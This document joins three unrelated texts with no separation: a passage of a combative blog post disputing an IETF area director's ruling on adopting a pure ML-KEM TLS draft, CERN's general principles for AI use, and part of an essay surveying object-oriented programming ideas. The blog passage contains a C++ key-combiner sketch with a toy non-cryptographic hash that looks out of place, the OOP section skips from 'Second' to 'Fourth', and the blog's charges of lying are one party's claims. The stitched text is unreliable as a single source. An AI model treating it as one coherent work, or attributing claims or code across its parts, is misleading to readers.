quietly shifted from "consensus" to "rough consensus".
(Did you notice this shift when I quoted IESG's "rough consensus" instruction?)
One reason this matters is that
"consensus"
is another of the legal requirements for standards-development organizations.
The law doesn't allow "rough consensus".
Also,
IETF claims that
"decision-making requires achieving broad consensus"
.
"broad consensus" is even stronger than "consensus",
since it's saying that there's consensus
in a broad group
.
Third,
the way that my complaint had established the
lack of consensus
was, first, by reviewing the general definition of "consensus"
(which I paraphrased from the definition in the law, omitting a citation only because
the TLS chairs had threatened me with a
list ban
if I mentioned the law again),
and then applying the components of that definition to the situation at hand.
Did the area director follow this structure?
Here's the definition of "consensus", or "rough consensus" if we're switching to that,
and now let's apply that definition?
No.
Nobody reading this message from the "area director" can figure out what the "area director" believes these words mean.
Wow, look at that:
"due process"
is another of the legal requirements for standards-development organizations.
Part of due process is simply
making clear what procedures are being applied
.
Could it possibly be that the people writing the law
were thinking through how standardization processes could be abused?
Numbers.
Without further ado,
let's look at what the "security area director" did write.
The IESG has requested that I evaluate the WG Adoption call
results for ML-KEM Post-Quantum Key Agreement for TLS 1.3
(draft-connolly-tls-mlkem-key-agreement). Please see below.
As noted above,
IESG had instructed the "area director" to answer the following question:
"Was rough consensus to adopt draft-connolly-tls-mlkem-key-agreement in the
TLS Working Group appropriately called by the WG chairs?"
Side note:
Given that the "area director" posted all of the following
on the same day that IESG instructed the "area director" to write this,
presumably this was all written in advance and coordinated with the rest of IESG.
I guess the real point of finally (on 1 November 2025) addressing the adoption decision (from 15 April 2025)
was to try to provide cover for the "last call" a few days later (5 November 2025).
ExecSum
I agree with the TLS WG Chairs that the Adoption Call result
was that there was rough consensus to adopt the document.
As noted above,
the TLS WG chairs had claimed "consensus",
and the "area director" had claimed that there was "clearly consensus".
The "area director" is now quietly shifting to a weaker claim.
Timeline
April 1: Sean and Joe announce WG Adoption Call
[ about 40 messages sent in the thread ]
"About 40"?
What happened to the "area director" previously writing
"There is clearly consensus
based on the 67 responses to the adoption call"?
And why is the number of messages supposed to matter in the first place?
April 15: Sean announces the Adoption Call passed.
[ another 50 messages are sent in the thread ]
Messages after the specified adoption-call deadline can't justify the claim that
"the Adoption Call result was that there was rough consensus to adopt the document".
The adoption call
failed
to reach consensus.
April 18 to today: A chain of (attempted) Appeals by D. J. Bernstein to the
AD(s), IESG and IAB, parts of which are still in process.
The fact that the ADs and IESG stonewalled in response to complaints
doesn't mean that they were "attempted" complaints.
Outcome
30 people participated in the consensus call, 23 were in favour of
adoption, 6 against and 1 ambivalent (names included at the bottom of
this email).
These numbers are
much
closer to reality
than the "area director" previously writing
"There is clearly consensus
based on the 67 responses to the adoption call. ...
The vast majority was in favour of adoption ...
There were a few dissenting opinions".
Also, given that the "area director" is continually making claims that aren't true
(see examples below)
and seems generally allergic to providing evidence
(the text I'm quoting below has, amazingly,
zero
URLs),
it's a relief to see the "area director" providing names to back up the claimed numbers here.
But somehow, even after being
caught
lying about the numbers before,
the "area director" still can't resist shading the numbers a bit.
The actual numbers were
20 people unequivocally supporting adoption,
2 people conditionally supporting adoption,
and 7 people unequivocally opposing adoption.
Clearly 7 is close to 6, and 20+2 is close to 23, but, hmmm, not exactly.
Let's check the details:
How does the "area director" end up with 6 negative votes rather than 7?
By falsely listing Thomas Bellebaum as "ambivalent"
and falsely attributing a "prefer not, but okay if we do" position to Bellebaum.
In fact,
Bellebaum had
written
"I agree with Stephen on this one and would not support adoption of non-hybrids."
(This was in reply to Stephen Farrell,
who had written "I'm opposed to adoption, at this time.")
How does the "area director" end up with 23 positive votes rather than 22?
By falsely listing the document author (Deirdre Connolly) as having stated a pro-adoption position during the call.
The "area director" seems generally clueless about conflict-of-interest issues
and probably doesn't find it obvious that an author
shouldn't
vote,
but the simple fact is that the author
didn't
vote.
She
sent
three
messages
during the call period;
all of those messages are merely commenting on specific points,
not casting a vote on the adoption question.
The document author didn't object to the "area director" fudging the numbers.
Bellebaum did politely
object
;
the "area director"
didn't argue
,
beyond trying to save face with comments such as "Thanks for the clarification".
More to the point,
the "area director" has never explained
whether or how the tallies of positive and negative votes
are supposed to be relevant to the "rough consensus" claim.
The "area director" also hasn't commented on IETF
saying
that IETF doesn't make decisions by voting.
Bogus arguments for the draft.
I mentioned in my previous blog post that IETF
claims
that "IETF participants use their best engineering judgment to find the best solution for the whole Internet,
not just the best solution for any particular network, technology, vendor, or user".
In favour argument summary
While there is a lack of substantiating why adoption is desired - which
is typical
Okay,
the "area director"
seems to have some basic awareness
that this document flunks the "engineering judgment" criterion.
The "area director" tries to defend this by saying that other documents flunk too.
So confidence-inspiring!
- the big use case seems to be to support those parties relying
on NIST and FIPS for their security requirements.
Wrong.
Anything+PQ, and in particular ECC+PQ,
complies with NIST's standards when the PQ part does.
See
NIST SP 800-227
:
"This publication approves the use of the key combiner (14) for any t > 1 if at least one
shared secret (i.e., S_j for some j) is generated from the key-establishment methods in SP
800-56A [1] or SP 800-56B [2] or an approved KEM."
For example, if the PQ part is ML-KEM as per FIPS 203,
then NIST allows ECC+PQ too.
What's next:
claiming that using PQ in an Internet protocol would violate NIST standards
unless NIST has standardized that particular Internet protocol?
This encompasses much
more than just the US government as other certification bodies and other
national governments have come to rely on the outcome of the NIST
competition,
which was the only public multi-year post-quantum cryptography effort
to evaluate the security of proposed new post-quantum algorithms.
I won't bother addressing the errors here,
since the bottom-line claim is orthogonal to the issue at hand.
The TLS WG already has an ECC+PQ document using NIST-approved PQ;
the question is whether to also have a document allowing the ECC seatbelt to be removed.
It
was also argued pure PQ has less complexity.
You know what would be even less complicated?
Encrypting with the null cipher!
There was a claim that PQ is less complex than ECC+PQ.
There was no response to
Andrey Jivsov
objecting that having a PQ option makes the ecosystem
more
complicated.
The basic error in the PQ-less-complex claim is that it ignores ECC+PQ already being there.
How the "area director" described the objections.
Opposed argument summary
Most of the arguments against adoption are focused on the fact
that a failsafe is better than no failsafe, irrespective of which
post-quantum algorithm is used,
This is the closest that the "area director" comes to acknowledging the central security argument for ECC+PQ.
Of course, the "area director" spends as little time as possible on security.
Compare this to
my own objection
to adoption,
which started with SIKE as a concrete example of the dangers
and continued with
"SIKE is not an isolated example: https://cr.yp.to/papers.html#qrcsp
shows that 48% of the 69 round-1 submissions to the NIST competition
have been broken by now".
and that the practical costs for hybrids
are negligible.
Hmmm.
By listing this as part of an "opposed argument summary",
is the "area director" suggesting that this was disputed?
When and where was the dispute?
As noted above, I've seen
unquantified NSA/GCHQ fearmongering about costs
,
but that was outside IETF.
If NSA and GCHQ tried the same arguments on a public mailing list
then they'd end up being faced with questions that they can't answer.
It was also argued that having an RFC gives too much
promotion or sense of approval to a not recommended algorithm.
When I wrote my own summary of the
objections
,
I provided a quote and link for each point.
The "area director" doesn't do this.
If the "area director" is accurately presenting an argument that was raised,
why not provide a quote and a link?
Is the "area director" misrepresenting the argument?
Making up a strawman?
The reader can't tell.
I have expanded some of the arguments and my interpretation
of the weight of these below.
This comment about "weight" is revealing.
What we'll see again and again is that the "area director"
is expressing the weight that
he
places on each argument
(within the arguments selected and phrased by the "area director"),
i.e., the extent to which
he
is convinced or not convinced by those arguments.
Given that IESG has power under IETF rules to unilaterally block publications approved by WGs,
it's unsurprising that the "area directors", in their roles as IESG members,
will end up evaluating the merits of WG-approved documents.
But
that isn't what this "area director" was instructed to do here
.
There isn't a WG-approved document at this point.
Instead the "area director" was instructed to evaluate whether the chairs "appropriately"
called "rough consensus" to "adopt" the document.
The "area director" is supposed to be evaluating procedurally what the WG decision-makers did.
Instead the "area director" is putting his thumb on the scale in favor of the document.
Incompetent risk management.
Non-hybrid as "basic flaw"
The argument by some opponents that non-hybrids are a "basic flaw" seems
to miscategorize what a "basic flaw" is. There is currently no known
"basic flaw" against MLKEM.
I think that the "area director" is trying to make some sort of claim here
about ML-KEM not having been attacked,
but the wording is so unclear as to be unevaluatable.
Why doesn't
KyberSlash
count?
How about
Clangover
?
How about the continuing advances in lattice attacks
that have already reduced ML-KEM below its claimed security targets,
the most recent news being from
last month
?
More importantly,
claiming that ML-KEM isn't "known" to have problems
is utterly failing to address the point of the ECC seatbelt.
It's like saying
"This car hasn't crashed, so the absence of seatbelts isn't a basic flaw".
As was raised, it is rather odd to be
arguing we must immediately move to use post-quantum algorithms while
at the same time argue these might contain fundamental basic flaws.
Here the "area director" is reasonably capturing
a statement from one document proponent
(original wording:
"I find it
to be cognitive dissonance to simultaneously argue that the quantum threat requires immediate work, and
yet we are also somehow uncertain of if the algorithms are totally broken. Both cannot be true at the same time").
But I promptly
followed up
explaining the error:
"Rolling out PQ is trying to reduce the damage from an attacker having a
quantum computer within the security lifetime of the user data. Doing
that as ECC+PQ instead of just PQ is trying to reduce the damage in case
the PQ part is broken. These actions are compatible, so how exactly do
you believe they're contradictory?"
There was, of course, no reply at the time.
The "area director" now simply repeats the erroneous argument.
As TLS (or IETF) is not phasing out all non-hybrid classics,
"Non-hybrid classics" is weird terminology.
Sometimes pre-quantum algorithms (ECC, RSA, etc.) are called "classical",
so I guess the claim here is that using just ECC in TLS isn't being phased out.
That's a bizarre claim.
There are intensive efforts to roll out ECC+PQ in TLS
to try to protect against quantum computers.
Cloudflare
reports
the usage of post-quantum cryptography having risen to about 50% of all browsers that it sees
(compared to 20% a year ago);
within those connections,
95%
use ECC+MLKEM768 and 5% use ECC+Kyber768.
The "area director" also gives no explanation of
why the "not phasing out" claim is supposed to be relevant here.
I find
this argument not strong enough
See how the "area director" is saying the weight that the "area director" places on each argument
(within the arguments selected and phrased by the "area director"),
rather than evaluating whether there was consensus to adopt the document?
to override the consensus of allowing
non-hybrid standards from being defined
Circular argument.
There wasn't consensus to adopt the document in the first place.
especially in light of the
strong consensus for marking these as "not recommended".
I think many readers will be baffled by this comment.
If something is "not recommended",
wouldn't that be an argument
against
standardizing it,
rather than an argument
for
standardizing it?
The answer is that "not recommended" doesn't mean what you think it means:
the "area director" is resorting to confusing jargon.
I don't think there's any point getting into the weeds on this.
Incompetent planning for the future.
Non-hybrids are a future end goal
Additionally, since if/when we do end up in an era with a CRQC, we are
ultimately designing for a world where the classic components offer less
to no value.
If someone is trying to argue for removing ECC,
there's a big difference between the plausible scenario of ECC having "less" value
and the extreme scenario of ECC having "no" value.
It's wrong for the "area director" to be conflating these possibilities.
As I put it
almost two years ago
:
"Concretely, think about a demo showing that spending a billion dollars on quantum computation can break a thousand X25519 keys.
Yikes! We should be aiming for much higher security than that!
We don't even want a billion-dollar attack to be able to break
one
key!
Users who care about the security of their data will be happy that we deployed post-quantum cryptography.
But are the users going to say 'Let's turn off X25519 and make each session a million dollars cheaper to attack'?
I'm skeptical.
I think users will need to see much cheaper attacks before agreeing that X25519 has negligible security value."
Furthermore,
let's think for a moment about the idea
that one will eventually want to transition to
just ML-KEM
,
the specific proposal that the "area director" is portraying as the future.
Here are three ways that this can easily be wrong:
Maybe ML-KEM's implementation issues
end up convincing the community to shift to a more robust option,
analogously to what happened with
ECC
.
Maybe the advances in public attacks continue to the point of breaking ML-KEM outright.
Maybe the cliff stops crumbling and ML-KEM survives,
but more efficient options also survive.
At this point there are quite a few options more efficient than ML-KEM.
(Random example:
SMAUG
.
The current SMAUG software isn't as fast as the ML-KEM software,
but this is outweighed by SMAUG using less network traffic than ML-KEM.)
Probably some options will be broken,
but ML-KEM would have to be remarkably lucky to end up as the most efficient remaining option.
Does this "area director" think that all of the more efficient options are going to be broken, while ML-KEM won't?
Sounds absurdly overconfident.
More likely is that the "area director" doesn't even realize that there are more efficient options.
For anyone thinking "presumably those newer options have received less scrutiny than ML-KEM":
we're talking about what to do long-term, remember?
Taking ML-KEM as the PQ component of ECC+PQ is working for getting something rolled out now.
Hopefully ML-KEM will turn out to not be a security disaster (or a patent disaster).
But, for guessing what will be best to do in 5 or 10 or 15 years,
picking ML-KEM is premature.
When and where to exactly draw the line of still using a
classic
component safeguard is speculation at best.
Here the "area director" is
clearly
attacking a strawman.
Already supporting pure post
quantum algorithms now to gain experience
How is rolling out PQ supposed to be gaining experience
that isn't gained from the current rollout of ECC+PQ?
Also, I think it's important to call out the word "pure" here
as incoherent, indefensible marketing.
What we're actually talking about isn't modifying ML-KEM in any way;
it's simply hashing the ML-KEM session key together with other inputs.
Is ML-KEM no longer "pure" when it's plugged into TLS,
which also hashes session keys?
(The word "pure" also showed up in a few of the earlier quotes.)
while not recommending it at this
time seems a valid strategy for the future, allowing people and
organizations
their own timeline of deciding when/if to go from hybrid to pure PQ.
Here we again see
the area director making a decision to support the document
,
rather than evaluating whether there was consensus in the WG to adopt the document.
Again getting the complexity evaluation backwards.
Added complexity of hybrids
There was some discussion on whether or not hybrids add more complexity, and
thus add risk, compared to non-hybrids. While arguments were made that
proper
classic algorithms add only a trivial amount of extra resources, it was also
pointed out that there is a cost of implementation, deployment and
maintenance.
Here the "area director" is again
making the same mistake explained earlier:
ignoring the fact that ECC+PQ is already there,
and thus getting the complexity evaluation backwards.
The "thus add risk" logic is also wrong.
Again, all of these options are more complex than the null cipher.
Additionally, the existence of draft-ietf-tls-hybrid-design and the
extensive
discussions around "chempat" vs "xwing" vs "kitchensink" shows that there is
at least some complexity that is added by the hybrid solutions.
No, the details of how to combine ECC with PQ in TLS are already settled and deployed.
Looking beyond TLS:
Chempat hashes the transcript (similarly to TLS),
making it robust for a wide range of protocols.
The other options add fragility by hashing less for the sake of minor cost savings.
Each of these options is under 10 lines of code.
The "area director" exaggerates the complexity by mentioning "extensive discussions",
and spends much more effort hyping this complexity as a risk
than acknowledging the risks of further PQ attacks.
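For a sense of what "under 10 lines of code" means in practice, here is an illustrative sketch (not the actual Chempat, X-Wing, or TLS construction; the function name, the byte-vector type, and the caller-supplied hash are assumptions for this example) of the general shape shared by these combiners: hash both shared secrets together with the transcript, so that breaking the session requires breaking both the ECC part and the PQ part.

#include <cstdint>
#include <functional>
#include <vector>

// Illustrative sketch only; real combiners fix a specific hash and encoding.
using Bytes = std::vector<std::uint8_t>;

Bytes combine_hybrid(const std::function<Bytes(const Bytes&)>& hash,
                     const Bytes& ecc_shared_secret,
                     const Bytes& pq_shared_secret,
                     const Bytes& transcript) {
    Bytes input;
    auto append = [&input](const Bytes& b) {
        input.insert(input.end(), b.begin(), b.end());
    };
    append(ecc_shared_secret);
    append(pq_shared_secret);
    append(transcript);  // binding the transcript is what adds robustness
    return hash(input);
}

int main() {
    // Toy stand-in hash for demonstration only (NOT cryptographic).
    auto toy_hash = [](const Bytes& in) {
        std::uint8_t x = 0;
        for (auto b : in) x = static_cast<std::uint8_t>(x ^ b);
        return Bytes{x};
    };
    Bytes secret = combine_hybrid(toy_hash, Bytes{1, 2}, Bytes{3, 4}, Bytes{5});
    (void)secret;
}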
Anyway,
it's not as if the presence of this document
has eliminated the discussions of ECC+PQ details,
nor is there any credible mechanism by which it could do so.
Again, the actual choice at hand is whether to have PQ as an option
alongside
ECC+PQ.
Adding that option
adds
complexity.
The "area director" is getting the complexity comparison backwards
by instead comparing
(1) PQ in isolation to (2) ECC+PQ in isolation.
Botching the evaluation of human factors.
RFCs being interpreted as IETF recommendation
It seems there is disagreement about whether the existence of an RFC
itself qualifies as the IETF defacto "recommending" this in the view
of IETF outsiders/ implemeners whom do not take into account
any IANA registry RECOMMENDED setting or the Mandatory-To-Implement
(MTI) reommendations.
I would expect a purchasing manager to have instructions
along the lines of "Buy only products complying with the standards",
and to never see IETF's confusing jumble of further designations.
This is an area where we recently found out there
is little consensus on an IETF wide crypto policy statement via an
RFC. The decision on whether an RFC adds value to a Code Point should
therefor be taken independently of any such notion of how outsiders might
interpret the existence of an RFC.
From a security perspective,
it's a big mistake to ignore the human factor,
such as the impact of a purchasing manager saying
"This is the most efficient standard so I'll pick that".
In this case, while Section 3 could be
considered informative, I believe Section 4 and Section 5 are useful
(normative)
content that assists implementers.
Is this supposed to have something to do with the consensus question?
And people have proposed extending the
Security Considerations to more clearly state that this algorithm is not
recommended at this point in time. Without an RFC, these recommendations
cannot be published by the IETF in a way that implementers would be known
to consume.
Ah, yes, "known to consume"!
There was, um,
one of those, uh, studies showing the details of, um, how implementors use RFCs,
which, uh, showed that 100% of the implementors diligently consumed the warnings in the RFCs.
Yeah, that's the ticket.
I'm sure the URL for this study is sitting around here somewhere.
Let's get back to the real world.
Even if an implementor does see a "This document is a bad idea" warning,
this simply doesn't matter
when the implementors are chasing contracts issued by purchasing managers
who simply care what's standardized and haven't seen the warning.
It's much smarter for the document to
(1) eliminate making the proposal that it's warning about
and (2) focus, starting in the title, on saying why such proposals are bad.
This makes people
more
likely to see the warning,
and at the same time it removes the core problem of the bad proposal being standardized.
Fictions regarding country actions.
Say no to Nation State algorithms
The history and birth of MLKEM from Kyber through a competition of the
international Cryptographic Community, organized through US NIST can
hardly be called or compared to unilateral dictated nation state algorithm
selection.
Certainly there were competition-like aspects to the process.
I tend to refer to it as a competition.
But in the end the selection of algorithms to standardize was made by NIST,
with
input behind the scenes from NSA
.
There has been no other comparable public effort to gather
cryptographers and publicly discuss post-quantum crypto candidates in a
multi-years effort.
Nonsense.
The premier multi-year effort by cryptographers to "publicly discuss post-quantum crypto candidates"
is the cryptographic literature.
In fact, other nation states are heavily relying on the
results produced by this competition.
Here's the objection from
Stephen Farrell
that the "area director" isn't quoting or linking to:
"I don't see what criteria we might use in adopting this that
wouldn't leave the WG open to accusations of favouritism if
we don't adopt other pure PQ national standards that will
certainly arise".
After reading this objection,
you can see how the "area director" is sort of responding to it
by suggesting that everybody is following NIST
(i.e., that the "certainly arise" part is wrong).
But that's not true.
NIST's selections are controversial.
For example, ISO is
considering
not just ML-KEM but also
Classic McEliece,
where NIST has
said
it's waiting for ISO
("After the ISO standardization process has been completed, NIST may consider developing a standard for Classic McEliece based on the ISO standard"),
and
FrodoKEM,
which NIST
said
"will not be considered further for standardization".
ISO is also now
considering
NTRU, where the
advertisement
includes "All patents related to NTRU have expired"
(very different from the ML-KEM situation).
BSI, which sets cryptographic standards for Germany,
recommends
not just ML-KEM
but also FrodoKEM (which it describes as "more conservative" than ML-KEM)
and Classic McEliece ("conservative and very thoroughly analysed").
Meanwhile China has called for
submissions
of new post-quantum proposals for standardization.
I could keep going,
but this is enough evidence to show that Farrell's prediction was correct;
the "area director" is once again wrong.
The use of MLKEM in the IETF will
not set a precedent for having to accept other nation state cryptography.
Notice how the "area director" is dodging Farrell's point.
If NSA can pressure the TLS WG into standardizing non-hybrid ML-KEM,
why can't China pressure the TLS WG into standardizing something China wants?
What criteria will IETF use to answer this question
without leaving the WG "open to accusations of favouritism"?
If you want people to believe that it isn't about the money
then you need a
really
convincing alternative story.
Denouement.
Not recommending pure PQ right now
There was a strong consensus that pure PQ should not be recommended at
this time, which is reflected in the document. There was some discussion
on RECOMMENDED N vs D, which is something that can be discussed in the
WG during the document's lifecycle before WGLC. It was further argued
that adopting and publishing this document gives the WG control over
the accompanying warning text, such as Security Considerations, that
can reflect the current consensus of not recommending pure MLKEM over
hybrid at publication time.
This is just rehashing earlier text,
even if the detailed wording is a bit different.
Conclusion
The pure MLKEM code points exist.
Irrelevant.
The question is whether they're being standardized.
An international market segment that
wants to use pure MLKEM exists
along with existing implementations of the draft on mainstream
devices and software.
Yes, NSA waving around money has convinced some corporations to provide software.
How is this supposed to justify the claim
that "there was rough consensus to adopt the document"?
There is a rough consensus to adopt the document
Repeating a claim doesn't make it true.
with a strong consensus for RECOMMENDED N and not MTI, which is
reflected in the draft.
Irrelevant.
What matters is whether the document is standardized.
The reasons to not publish MLKEM as an RFC seem
more based on personal opinions of risk and trust not shared amongst all
participants as facts.
This sort of dismissal might be more convincing
if it were coming from someone providing more URLs and fewer easily debunked claims.
But it's in any case not addressing the consensus question.
Based on the above, I believe the WG Chairs made the correct call that
there was rough consensus for adopting
draft-connolly-tls-mlkem-key-agreement
The chairs claimed that "we have consensus to adopt this draft"
(based on claiming that "there were enough people willing to review the draft",
never mind the number of objections).
That claim is wrong.
The call for adoption failed to reach consensus.
The "area director" claimed that
"There is clearly consensus
based on the 67 responses to the adoption call. ...
The vast majority was in favour of adoption ...
There were a few dissenting opinions".
These statements still haven't been retracted;
they were and are outright lies about what happened.
Again, the
actual tallies
were
20 people unequivocally supporting adoption,
2 people conditionally supporting adoption,
and 7 people unequivocally opposing adoption.
Without admitting error,
the "area director" has retreated to a claim of "rough consensus".
The mishmash of ad-hoc comments from the "area director"
certainly doesn't demonstrate any coherent meaning of "rough consensus".
It's fascinating that IETF's
advertising to the public
claims that IETF's "decision-making requires achieving broad consensus",
but IETF's
WG procedures
allow controversial documents to be pushed through on the basis of "rough consensus".
To be clear,
that's only if the "area director" approves of the documents,
as you can see from the same "area director"
issuing yet another mishmash of ad-hoc comments to
overturn
a separate chair decision in September 2025.
You would think that the WG procedures would
define
"rough consensus".
They don't.
All they say is that
"51% of the working group does not qualify as 'rough consensus' and 99% is better than rough",
not even making clear whether 51% of
voters
within a larger working group can qualify.
This leaves a vast range of ambiguous intermediate cases up to the people in power.
Version:
This is version 2025.11.23 of the 20251123-dodging.html web page.
Artificial intelligence (AI) can be found at CERN in many contexts: embedded in devices, software products and cloud services procured by CERN, brought on-site by individuals or developed in-house.
Following the
approval of a CERN-wide AI strategy
, these general principles are designed to promote the responsible and ethical use, development and deployment (collectively “use”) of AI at CERN.
They are technology neutral and apply to all AI technologies as they become available.
The principles apply across all areas of CERN’s activities, including:
AI for scientific and technical research
: data analysis, anomaly detection, simulation, predictive maintenance and optimisation of accelerator performance or detector operations, and
AI for productivity and administrative use
: document drafting, note taking, automated translation, language correction and enhancement, coding assistants, and workflow automation.
General Principles
CERN, members of its personnel, and anyone using CERN computing facilities shall ensure that AI is used in accordance with the following principles:
Transparency and explainability
: Document and communicate when and how AI is used, and how AI contributes to specific tasks or decisions.
Responsibility and accountability
: The use of AI, including its impact and resulting outputs throughout its lifecycle, must not displace ultimate human responsibility and accountability.
Lawfulness and conduct
: The use of AI must be lawful, compliant with CERN’s internal legal framework and respect third-party rights and CERN’s Code of Conduct.
Fairness, non-discrimination, and “do no harm”
: AI must be used in a way that promotes fairness and inclusiveness and prevents bias, discrimination and any other form of harm.
Security and safety
: AI must be adequately protected to reduce the likelihood and impact of cybersecurity incidents. AI must be used in a way that is safe, respects confidentiality, integrity and availability requirements, and prevents negative outcomes.
Sustainability
: The use of AI must be assessed with the goal of mitigating environmental and social risks and enhancing CERN's positive impact in relation to society and the environment.
Human oversight
: The use of AI must always remain under human control. Its functioning and outputs must be consistently and critically assessed and validated by a human.
Data privacy
: AI must be used in a manner that respects privacy and the protection of personal data.
Non-military purposes
: Any use of AI at CERN must be for non-military purposes only.
A one-page summary of the main themes of the CERN AI strategy
OOP-bashing seems fashionable nowadays. I decided to write this article after seeing two OOP-related articles on
Lobsters
in quick succession. I’m not interested in defending or attacking OOP, but I do want to throw in my two cents and offer a more nuanced view.
The industry and the academy have used the term “object-oriented” to mean so many different things. One thing that makes conversations around OOP so unproductive is the lack of consensus on what OOP is.
What is Object-Oriented Programming?
Wikipedia defines it
as “a programming paradigm based on the concept of objects.” This definition is unsatisfactory, as it requires a definition of an “object” and fails to encompass the disparate ways the term is used in the industry. There is also
Alan Kay’s vision of OOP
. However, the way most people use the term has drifted apart, and I don’t want to fall into
essentialism
or
etymological fallacy
by insisting on a “true” meaning.
Instead, I think it is better to treat OOP as a mixed bag of interrelated ideas and examine them individually. Below, I will survey some ideas related to OOP and mention their pros and cons (in my subjective mind).
Classes
Object-oriented programming is a method of implementation in which programs are organized as cooperative collections of objects, each of which represents an instance of some class, and whose classes are all members of a hierarchy of classes united via inheritance relationships. — Grady Booch
Classes extend the idea of a “struct” or “record” with support for the method syntax, information hiding, and inheritance. We will talk about those specific features later.
Classes can also be viewed as blueprints for objects. It is not the only way to do that, and
prototypes
is an alternative pioneered by
Self
and, most famously, used by JavaScript. Personally, I feel that prototypes are harder to wrap one’s head around compared to classes. Even JavaScript tries to hide its usage of prototypes from newcomers with ES6 classes.
Method Syntax
In Japanese, we have sentence chaining, which is similar to method chaining in Ruby —
Yukihiro Matsumoto
The method syntax is one of the less controversial OOP features. It captures common programming use cases involving operations on a specific subject. Even in languages without methods, it is common to see functions effectively serve as methods by taking the relevant data as their first argument (or last, in languages with currying).
The syntax involves method definitions and method calls. Usually, languages supporting methods have both, unless you consider the “pipe operators” in functional languages as a form of method call.
The method call syntax aids IDE autocompletion, and method chaining is often more ergonomic than nested function calls (similar to the pipe operator in functional languages).
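As a tiny illustration (the StringBuilder type below is made up for this example), the chained form reads left to right in the order the steps happen, while the free-function form reads inside-out:

#include <cctype>
#include <iostream>
#include <string>

// A made-up builder type, just to contrast chaining with nested calls.
struct StringBuilder {
    std::string value;

    StringBuilder& append(const std::string& s) {
        value += s;
        return *this;
    }

    StringBuilder& upper() {
        for (char& c : value) {
            c = static_cast<char>(std::toupper(static_cast<unsigned char>(c)));
        }
        return *this;
    }
};

int main() {
    // Method chaining: each step returns *this, so the pipeline reads in order.
    std::cout << StringBuilder{}.append("hello, ").append("world").upper().value << '\n';
    // With free functions the same pipeline would read inside-out:
    // upper(append(append(builder, "hello, "), "world"))
}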
There are some debatable aspects of the method syntax, too. First, in many languages, methods are often not definable outside of a class, which causes a power imbalance compared to functions. There are certain exceptions, such as Rust (methods are always defined outside of the struct), Scala, Kotlin, and C# (extension methods).
Second, in many languages,
this
or
self
is implicit. This keeps the code more concise, but it can also introduce confusion and increase the risk of accidental name shadowing. Another drawback of an implicit this is that it is always passed as a pointer, and its type cannot be changed. This means you cannot pass it as a copy, and sometimes this indirection leads to performance issues. More importantly, because the type of this is fixed, you cannot write generic functions that accept different
this
types. Python and Rust got
this
right from the start, and C++ just fixed this issue in C++23 with
deducing this
.
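A minimal sketch of what that looks like (the Tally type is invented for this example, and it needs a C++23 compiler):

#include <iostream>
#include <utility>

struct Tally {
    int value = 0;

    // C++23 "deducing this": the object parameter is explicit, so its type
    // (Tally&, const Tally&, Tally&&, or even a derived class) is deduced
    // instead of being a fixed implicit pointer.
    template <typename Self>
    auto&& add(this Self&& self, int n) {
        self.value += n;
        return std::forward<Self>(self);
    }

    void show(this const Tally& self) { std::cout << self.value << '\n'; }
};

int main() {
    Tally t;
    t.add(1).add(2).show();  // prints 3
}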
Fourth, the dot notation is used for both instance variable accesses and method calls in most languages. This is an intentional choice to make methods look more
uniform
with objects. In certain dynamically typed languages where
methods are instance variables
, this is fine and pretty much not even a choice. On the other hand, in languages like C++ or Java, this can cause confusion and shadowing problems.
Information Hiding
Its interface or definition was chosen to reveal as little as possible about its inner workings —
[Parnas, 1972b]
In Smalltalk, instance variables are never directly accessible from outside the object, while all methods are exposed. More modern OOP languages support information hiding via access specifiers like
private
at the class level. Even non-OOP languages usually support information hiding in some way, be it module systems, opaque types, or even C’s header separation.
Information hiding is a good way to prevent invariants from being violated. It is also a good way to separate frequently changed implementation details from a stable interface.
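For instance, a hypothetical class like the one below keeps its fields private so that the "size never exceeds capacity" invariant can only be enforced (and broken) in one place:

#include <cstddef>
#include <iostream>
#include <vector>

class BoundedStack {
public:
    explicit BoundedStack(std::size_t capacity) : capacity_(capacity) {}

    bool push(int v) {
        if (items_.size() == capacity_) return false;  // invariant preserved
        items_.push_back(v);
        return true;
    }

    std::size_t size() const { return items_.size(); }

private:
    std::size_t capacity_;    // hidden: callers can't change the limit
    std::vector<int> items_;  // hidden: callers can't bypass push()
};

int main() {
    BoundedStack s(2);
    s.push(1);
    s.push(2);
    bool accepted = s.push(3);  // rejected: it would break the invariant
    std::cout << std::boolalpha << accepted << ' ' << s.size() << '\n';  // false 2
}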
Nevertheless, aggressively hiding information may cause unnecessary boilerplate or
abstraction inversion
. Another criticism comes from functional programmers, who argue that you don’t need to maintain invariants and thus don’t need much information hiding if data is
immutable
. And, in a sense, OOP encourages people to write mutable objects whose invariants must be maintained.
Information hiding also encourages people to create small, self-contained objects that “know how to handle themselves,” which leads directly into the topic of encapsulation.
Encapsulation
If you can, just move all of that behavior into the class it helps. After all, OOP is about letting objects take care of themselves. — Bob Nystrom,
Game Programming Patterns
Encapsulation is often confused with information hiding, but the two are distinct. Encapsulation refers to bundling data with the functions that operate on it. OOP languages directly support encapsulation with classes and the method syntax, but there are other approaches (e.g.,
the module system in OCaml
).
Data-oriented design
has a lot to say about bundling data and functionality. When many objects exist, it is often much more efficient to process them in batches rather than individually. Having small objects with distinct behaviors can lead to poor data locality, more indirection, and fewer opportunities for parallelism. Of course, advocates of data-oriented design don’t reject encapsulation outright, but they encourage a more coarse-grained form of it,
organized around how the code is actually used rather than how the domain model is conceptually structured
.
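A sketch of that contrast, using a made-up particle example: the second layout is organized around what the update loop actually touches rather than around per-object encapsulation.

#include <cstddef>
#include <vector>

// Array-of-structs: each particle is its own little "object".
struct Particle {
    float x = 0, y = 0, vx = 0, vy = 0;
};

// Struct-of-arrays: the same data, laid out around how the update loop uses it,
// so positions and velocities are contiguous (better cache behaviour, easier SIMD).
struct Particles {
    std::vector<float> x, y, vx, vy;
};

void update(Particles& p, float dt) {
    for (std::size_t i = 0; i < p.x.size(); ++i) {
        p.x[i] += p.vx[i] * dt;
        p.y[i] += p.vy[i] * dt;
    }
}

int main() {
    Particles p;
    p.x = {0.0f}; p.y = {0.0f}; p.vx = {1.0f}; p.vy = {2.0f};
    update(p, 0.5f);
}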
Separation of interface and implementation is an old idea closely related to information hiding, encapsulation, and
abstract data type
. In some sense, even C’s header files can be considered an interface, but OOP usage of “interface” most often refers to a specific set of language constructs that support polymorphism (typically implemented via inheritance). Usually, an interface can’t contain data, and in more restricted languages (e.g., early versions of Java), it can’t contain method implementations either. The same idea of an interface is also common in non-OOP languages: Haskell type classes, Rust traits, and Go interfaces all serve the role of specifying an abstract set of operations independent of implementations.
